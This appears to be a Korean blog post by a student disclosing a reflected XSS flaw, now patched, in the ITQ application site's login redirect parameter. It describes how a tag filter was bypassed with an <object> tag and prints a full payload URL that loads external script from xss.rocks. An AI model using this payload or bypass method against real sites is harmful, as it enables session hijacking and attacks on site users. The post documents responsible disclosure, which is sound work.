ITQ 사이트 취약점 제보

 어제 6반에서 칠판에 http://apply.itq.or.kr 적혀 있었다. 그냥 재미삼아 친구한테 "이 사이트 취약점 내가 오늘안에 찾는다"라고 말했는데, 그게 사실이 되었다. Reflected XSS(Cross Site Scripting) 취약점을 찾았고, 현재는 완벽히 패치된 상태이다.

 로그인 창에서 발견한 취약점인데, 로그인 후 이동하는 url을 purl이라는 GET 파라미터를 이용해서 로그인 후 purl 대로 이동하는 방식이었다. 하지만, ">로 태그를 탈출할 수 있었고, <marquee>, <b> 등 여러가지 태그를 사용할 수 있었다. 

 하지만, <script>, javascript: , <img> 등등 거의 모든 태그들이 막혀있어서 불가능할거라 생각하고 어제 탐구하던 것을 그만두었다. 오늘 아침에 다시 보니, <object> 태그를 깜빡하고 있었다는 것을 알았고 <object> 태그를 통해서 XSS BeEF의 악성 javascript 코드를 실행했다. 

 http://apply.itq.or.kr/member/login.asp?purl=www.naver.com%22%3E%3Cmarquee%3E%3Cb%3E%3COBJECT%20TYPE=%22text/x-scriptlet%22%20DATA=%22http://xss.rocks/scriptlet.html%22%3E%3C/OBJECT%3E

(참고로 현재에는 패치가 된 상태이다)

그리고 한 2시간도 지나지 않아서 답변을 받았다. ITQ 생산성 본부에 감사를 표한다.